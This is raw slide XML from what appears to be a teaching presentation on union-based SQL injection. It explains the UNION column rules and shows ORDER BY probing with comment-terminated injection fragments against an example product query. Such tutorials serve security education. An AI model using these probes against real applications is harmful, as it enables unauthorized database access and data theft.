                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="8250" spc="-530" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>WHAT </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="8250" spc="-965">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>IS </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="8250" spc="-1240">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SQL  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="8250" spc="-910">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>INJECTION?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1266380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80"/>
              <a:t>Exploiting </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-235"/>
              <a:t>Union-Based</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-850"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-335"/>
              <a:t>SQLi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4752" y="2931714"/>
            <a:ext cx="16204565" cy="628142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 marR="360680">
              <a:lnSpc>
                <a:spcPts val="4950"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="755"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-245">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>There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200">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>are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20">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>two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160">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>rules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5">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>for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155">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>combining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-45">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>the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100">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>result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254">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>sets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>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>of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20">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>two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-170">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>queries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190">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>by  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-225">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>using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65" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>UNION</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-65">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr sz="4600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" indent="-377190">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1143635" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-280">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>The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110">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>number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180">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>and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80">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>order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>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>of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175">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>columns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125">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>must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175">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>be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275">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>same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50">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>in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85">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>all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150">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>queries</a:t>
            </a:r>
            <a:endParaRPr sz="3950">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" indent="-377190">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="385"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1143635" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-280">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-145">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>data </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-150">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>types </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-125">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>must </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-175">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>be</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-320">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-110">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>compatible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6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4600" spc="-114">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Exploitation:</a:t>
            </a:r>
            <a:endParaRPr sz="4600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" indent="-377190">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="415"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1143635" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-210">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Figure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>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>out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110">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>number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>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>of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175">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>columns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5">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>that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114">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>query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204">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>is </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-175">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>making</a:t>
            </a:r>
            <a:endParaRPr sz="3950">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" indent="-377190">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="365"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1143635" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-210">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Figure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145">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>data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150">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>types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>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>of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175">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>columns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114">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>(mainly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105">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>interested</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-195">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-50">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>in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105">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>string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140">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>data)</a:t>
            </a:r>
            <a:endParaRPr sz="3950">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" indent="-377190">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="285"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1143635" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-330">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Use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295">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>UNION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85">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>operator</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-195">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="35">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>to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5">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>output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55">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>information</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-195">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-35">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>from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210">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>database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1266380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80"/>
              <a:t>Exploiting </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-235"/>
              <a:t>Union-Based</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-850"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-335"/>
              <a:t>SQLi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4752" y="2931714"/>
            <a:ext cx="17197705" cy="135763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755"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-135">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Determining </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-45">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-125">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>number </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-200">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>columns </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-110">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>required </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-50">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-240">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>an </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-685">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-70">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>injection</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-815">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-340">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>UNION  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-150">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>attack </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-225">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>using </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-190" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>ORDER</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-455" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-260" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>BY</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-260">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr sz="4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89514" y="4626833"/>
            <a:ext cx="16341090" cy="39370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7940" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="452120">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="220"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="1459865" algn="l"/>
                <a:tab pos="2468245" algn="l"/>
                <a:tab pos="3188335" algn="l"/>
                <a:tab pos="3908425" algn="l"/>
                <a:tab pos="5060315" algn="l"/>
                <a:tab pos="5924550" algn="l"/>
                <a:tab pos="6356985" algn="l"/>
                <a:tab pos="6788784" algn="l"/>
                <a:tab pos="7653020" algn="l"/>
                <a:tab pos="8084820" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="240">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>select	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="505">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>title,	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="190">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>cost	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="105">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>from	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="155">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>product	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="15">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>where	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="335">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>id	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-40">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>=1	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="175">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>order	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="50">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>by	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-1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2205" y="5348812"/>
            <a:ext cx="16384269" cy="109347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389255" marR="5080" indent="-377190">
              <a:lnSpc>
                <a:spcPts val="3960"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="640"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="389255" algn="l"/>
                <a:tab pos="389890" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="3700" spc="-110">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Incrementally </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3700" spc="-55">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>inject </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3700" spc="-285">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3700" spc="-190">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>series </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3700">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3700" spc="-560">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>ORDER </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3700" spc="-610">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>BY </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3700" spc="-240">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>clauses </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3700">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>until </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3700" spc="-145">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>you </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3700" spc="-125">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>get </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3700" spc="-200">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>an </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3700" spc="-40">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>error </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3700" spc="-20">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3700" spc="-170">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>observe</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3700" spc="-725">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3700" spc="-285">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>a  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3700" spc="-40">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>different </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3700" spc="-125">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>behaviour </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3700" spc="-40">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>in the</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3700" spc="-585">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3700" spc="-100">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>application</a:t>
            </a:r>
            <a:endParaRPr sz="3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89514" y="6864021"/>
            <a:ext cx="16341090" cy="1028065"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="16341090" h="1028065">
                <a:moveTo>
                  <a:pt x="16340832" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1027706"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16340832" y="1027706"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1634083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10107" y="6957621"/>
          <a:ext cx="1791335" cy="934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594"/>
                <a:gridCol w="431800"/>
                <a:gridCol w="535305"/>
              </a:tblGrid>
              <a:tr h="287949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dirty="0" sz="2050" spc="175">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>order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9"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr dirty="0" sz="2050" spc="50">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>by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39"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr dirty="0" sz="205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2050">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>--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2F2F2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="314126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</a:pPr>
                      <a:r>
                        <a:rPr dirty="0" sz="2050" spc="175">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>order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dirty="0" sz="2050" spc="50">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>by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45"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr dirty="0" sz="2050" spc="-5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2050">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>--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2F2F2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="332030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</a:pPr>
                      <a:r>
                        <a:rPr dirty="0" sz="2050" spc="175">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>order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dirty="0" sz="2050" spc="50">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>by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45"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr dirty="0" sz="2050" spc="-5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2050">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>--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489514" y="8428937"/>
            <a:ext cx="16341090" cy="39370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7940" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="452120">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="220"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="1028065" algn="l"/>
                <a:tab pos="1892300" algn="l"/>
                <a:tab pos="2324100" algn="l"/>
                <a:tab pos="3620135" algn="l"/>
                <a:tab pos="4628515" algn="l"/>
                <a:tab pos="4916170" algn="l"/>
                <a:tab pos="5348605" algn="l"/>
                <a:tab pos="5924550" algn="l"/>
                <a:tab pos="6356350" algn="l"/>
                <a:tab pos="7220584" algn="l"/>
                <a:tab pos="7653020" algn="l"/>
                <a:tab pos="8228965" algn="l"/>
                <a:tab pos="9236710" algn="l"/>
                <a:tab pos="9669145" algn="l"/>
                <a:tab pos="10532745" algn="l"/>
                <a:tab pos="10965180" algn="l"/>
                <a:tab pos="11541125" algn="l"/>
                <a:tab pos="12549505" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-45">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>The	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-350">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>ORDER	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-235">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>BY	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="250">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>position	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-30">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>number	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-10">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>3	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="390">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>is	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="180">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>out	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="275">
